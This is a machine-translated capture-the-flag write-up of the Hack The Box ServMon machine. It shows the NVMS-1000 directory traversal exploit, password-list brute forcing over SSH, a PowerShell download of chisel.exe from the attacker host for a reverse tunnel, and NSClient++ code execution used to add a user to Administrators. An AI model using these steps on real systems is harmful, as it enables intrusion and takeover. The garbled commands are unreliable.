disclaimer

The hosts infiltrated in this article are legally authorized. The tools and methods used in this article are only for learning and communication. Please do not use the tools and infiltration ideas used in this article for any illegal purposes. I am not responsible for any consequences arising therefrom, nor for any misuse or damage caused.

Service to detect

Chrysene ─(root💀kali)-[~/ HTB /ServMon] ├ ─# nmap-sv-pn 10.10.10.184-p-host discovery disabled (-pn). All addresses will be Starting Nmap 7.91 (https://nmap.org) at 2021-12-06 04:37 EST Nmap scan Marked 'up' and scan times will be slower Report for 10.10.10.184 Host is up (0.34s latency). Not shown: 991 Closed ports PORT STATE SERVICE VERSION 21/ TCP open FTP Microsoft FTPD 22/ TCP open SSH OpenSSH for_windows_7.7 (Protocol 2.0) 80/ TCP Open HTTP 135/ TCP Open MSRPC Microsoft Windows RPC 139/ TCP Open Netbios-SSN Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 5040/tcp open unknown 5666/tcp open tcpwrapped 6063/tcp open x11? 6699/tcp open napster? 8443/tcp open ssl/https-alt 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft  Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open msrpc Microsoft Windows RPCCopy the code

Many services are enabled, FTP, SSH, HTTP, SMB, and so on.

Port 80 The login page of an NVMS is displayed, and the login account is unknown

Test found that FTP can be accessed anonymously, so start with FTP

FTP Anonymous Login

Chrysene ─(root💀kali)-[~/ HTB /ServMon] ├ ─# FTP 10.10.10.84 Connected to 10.10.10.84 (10.10.10.184:root): anonymous 331 anonymous Access allowed, send identity (E-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> ls 200 PORT command successful. 125 Data connection already open; Transfer starting. 01-18-20 11:05AM <DIR> Users 226 Transfer complete. ftp> cd Uswes 550 The system cannot find the file  specified. ftp> cd Users 250 CWD command successful. ftp> ls -alh 200 PORT command successful. 125 Data connection already open; Transfer starting. 01-18-20 11:06AM <DIR> Nadine 01-18-20 11:08AM <DIR> NathanCopy the code

So I’m going to go into a Users folder, and I’m going to go into a second level directory and I have two user folders Nadine and Nathan, good, so I’m going to get two user names and I’m going to download Nadine/Confidential. TXT and Nathan/Notes to do.txt for local analysis

Look at these two files

├ ─(root💀kali)-[~/ himp] └─ ─(~/ himp/himp) I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back Into the secure Folder. Regards Nadine chrysene ─(root💀kali)-[~/ HTB /ServMon] ├ ─# cat 'Notes to do.txt' 1) Change the password for NVMS - Complete 2) Lock down the NSClient Access - Complete 3) Upload the passwords 4) Remove public access to NVMS 5) Place the secret files in SharePointCopy the code

It’s kind of CTF…

There may be a Secure Folder that contains Nathan’s changed password, which can be used to log in to the NVMS backend. There is a file named passwords.txt on Nathan’s desktop

Directory traversal

The CMS of port 80, named NVMS-10000, has a directory traversal vulnerability

I found this vulnerability cVE-2019-20085 exp on Github

Try to read the Windows/ System.ini file

Chrysene ─(root💀kali)-[~/ HTB /ServMon] ├ ─#./nvms.py 10.10.10.184 Windows/system.ini win.ini [+] DT Attack Succeeded [+] Saving  File Content [+] Saved [+] File Content ++++++++++ BEGIN ++++++++++ ; for 16-bit app support [386Enh] woafont=dosapp.fon EGA80WOA.FON=EGA80WOA.FON EGA40WOA.FON=EGA40WOA.FON CGA80WOA.FON=CGA80WOA.FON CGA40WOA.FON=CGA40WOA.FON [drivers] wave=mmdrv.dll timer=timer.drv [mci] ++++++++++ END ++++++++++Copy the code

Read successfully, now read the selected. TXT under Nathan’s desktop

┌ ─ ─ (root 💀 kali) - ~ / HTB/ServMon └ ─ #. / NVMS py 10.10.10.184 users/Nathan/Desktop/Passwords. TXT Passwords. TXT [+] DT Attack Succeeded [+] Saving File Content [+] Saved [+] File Content ++++++++++ BEGIN ++++++++++ 1nsp3ctTh3Way2Mars! Th3r34r3To0M4nyTrait0r5! B3WithM30r4ga1n5tMe L1k3B1gBut7s@W0rk 0nly7h3y0unGWi11F0l10w IfH3s4b0Utg0t0H1sH0me Gr4etN3w5w17hMySk1Pa5$ ++++++++++ END  ++++++++++Copy the code

Now we find a dictionary of passwords, and according to FTP tips, one of them is Nathan’s password

I tried to log in to the web background using these passwords, failed to log in to Nathan’s account using evil-winrm, failed to log in to Nadine’s account using evil-winrm, failed to log in to Nathan’s account using SSH, failed, slightly crashed.

Finally, SSH through Nadine one by one, and it works…

The e story tells us that enumerations are important.

The password is L1k3B1gBut7s@W0rk

SSH [email protected] Microsoft Windows [Version 10.0.18363.752] (c) 2019 Microsoft Corporation. All rights reserved. nadine@SERVMON C:\Users\Nadine>whoami servmon\nadineCopy the code

Get user.txt on Nadine’s desktop

Right to mention

View all local TCP connections

PS C: \ Users \ Nadine > netstat ano | findstr searches TCP TCP 0.0.0.0:21 0.0.0.0:0 2600 TCP 0.0.0.0 LISTENING: 22 0.0.0.0:0 LISTENING 2728 TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 5448 TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 880 TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 5060 TCP 0.0.0.0:5666 0.0.0.0:0 LISTENING 2708 TCP 0.0.0.0:5666 0.0.0.0:0 LISTENING 2708 TCP 0.0.0.0:6063 0.0.0.0:0 LISTENING 5448 TCP 0.0.0.0:6699 0.0.0.0:0 LISTENING 5448 TCP 0.0.0.0:8443 0.0.0.0:0 LISTENING 2708 TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 632 TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 488 TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 924 TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 1348 TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 2192 TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 624 TCP 0.0.0.0:49670 0.0.0.0:0 LISTENING 2424 TCP 10.10.10.184:22 10.10.14.16:51872 ESTABLISHED 2728 TCP 10.10.10.184:22 10.10.14.16:51886 ESTABLISHED 2728 TCP 10.10.10.184:139 0.0.0.0:0 TIME_WAIT 0 TCP 10.10.10.184:49704 10.10.14.16:8000 ESTABLISHED 127.0.0.1:49674 127.0.0.1:49675 ESTABLISHED 5448 TCP 127.0.0.1:49675 127.0.0.1:49674 ESTABLISHED 5448 TCP 127.0.0.1:49676 127.0.0.1:49677 ESTABLISHED 5448 TCP 127.0.0.1:49677 127.0.0.1:49676 TCP [::]:21 [::]:0  LISTENING 2600 TCP [::]:22 [::]:0 LISTENING 2728 TCP [::]:135 [::]:0 LISTENING 880 TCP [::]:445 [::]:0 LISTENING 4 TCP [::]:5666 [::]:0 LISTENING 2708 TCP [::]:49664 [::]:0 LISTENING 632 TCP [::]:49665 [::]:0 LISTENING 488 TCP [::]:49666 [::]:0 LISTENING 924 TCP [::]:49667 [::]:0 LISTENING 1348 TCP [::]:49668 [::]:0 LISTENING 2192 TCP [::]:49669 [::]:0 LISTENING 624 TCP [::]:49670 [::]:0 LISTENING 2424Copy the code

Port 8443 local open has a NSClient++ page, but the login has been 403 Your not allowed

Local IP logins may be restricted

Tunnel connection service

We use Chisel to make a tunnel

Get Chisel.exe to the target

powershell -c “(new-object System.Net.WebClient). DownloadFile (‘ http://10.10.14.16:8000/chisel.exe ‘, ‘C: \ temp \ chisel. Exe)”

Kali starts listening

./chisel server -p 8000 –reverse

Windows connect

. \ chisel. Exe client 10.10.14.16:8000 R: 8443: localhost: 8443

Now open the browser https://127.0.0.1:8443/ and enter the password, report 403 Invalid password

It means we are now allowed to log into the background

So what’s the password?

Click on the Forgotten password?

NSClient++ password

The NSClient++ password can be found by running:

nscp web -- password --display

or you can sett a new password:

nscp web -- password --set new-password
Copy the code

Display we can display the password with the command

Go to: C:\Program Files\NSClient++

Run NSCP web — password –display

nadine@SERVMON C:\>cd C:\Program Files\NSClient++

nadine@SERVMON C:\Program Files\NSClient++>nscp web -- password --display
Current password: ew2x6SsGTxjRwXOT


Copy the code

The login password is ew2x6SsGTxjRwXOT

According to the NSClient++ keyword, we found exp in Google for this remotely executed code

I have tried a lot of bounce shell methods here, because the target machine has an antivirus, many exe files can’t execute, powershell can’t bounce shell, worry…

Assuming that the program is being executed with super administrator privileges, there should be no need to bounce the shell and it should be possible to promote the current user to administrator privileges

View the current user group in the Users group

nadine@SERVMON c:\Temp>net user nadine User name Nadine Full Name Comment User's comment Country/region code 000 (System  Default) Account active Yes Account expires Never Password last set 14/01/2020 20:36:20 Password expires Never Password  changeable 14/01/2020 20:36:20 Password required Yes User may change password No Workstations allowed All Logon script User profile Home directory Last logon 08/12/2021 14:55:43 Logon hours allowed All Local Group Memberships *Users Global  Group memberships *None The command completed successfully.Copy the code

Add Nadine to the Administrators group

Chrysene ─(root💀kali)-[~/ HTB /ServMon] ├ ─# python3 imp. Py -t 127.0.0.1-p 127.0.1-p '-c 'cmd.exe /c net Localgroup Administrators/Add Nadine '1 ⨯ [!] Targeting Base URL https://127.0.0.1:8443 [!]  Obtaining Authentication Token . . . [+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ [!]  Enabling External Scripts Module . . . [!]  Configuring Script with Specified Payload . . . [+] Added External Script (name: LnEZSwPpcJ) [!]  Saving Configuration . . . [!]  Reloading Application . . . [!]  Waiting for Application to reload . . . [!]  Obtaining Authentication Token . . . [+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ [!]  Triggering payload, should execute shortly . . .Copy the code

Check again, added to the administrator group

nadine@SERVMON c:\Temp>net user nadine User name Nadine Full Name Comment User's comment Country/region code 000 (System  Default) Account active Yes Account expires Never Password last set 14/01/2020 20:36:20 Password expires Never Password  changeable 14/01/2020 20:36:20 Password required Yes User may change password No Workstations allowed All Logon script User profile Home directory Last logon 08/12/2021 14:55:43 Logon hours allowed All Local Group Memberships *Administrators *Users Global Group memberships *None The command completed successfully.Copy the code

Note that after the preceding command is executed, the command cannot take effect immediately. You need to exit the current SSH and log in again

Now we can go to the administrator directory to see root.txt, but still do not have the permission to view.

nadine@SERVMON C:\Users\Administrator>cd Desktop

nadine@SERVMON C:\Users\Administrator\Desktop>type root.txt
Access is denied.


Copy the code

Change the permissions on the root.txt file so Nadine has full control over it

nadine@SERVMON C:\Users\Administrator\Desktop>Cacls C:\Users\Administrator\Desktop\root.txt /t /e /c /g nadine:F processed file: nadine@SERVMON C: Users\Administrator\Desktop>type root. TXT {}Copy the code

Root. TXT was successfully read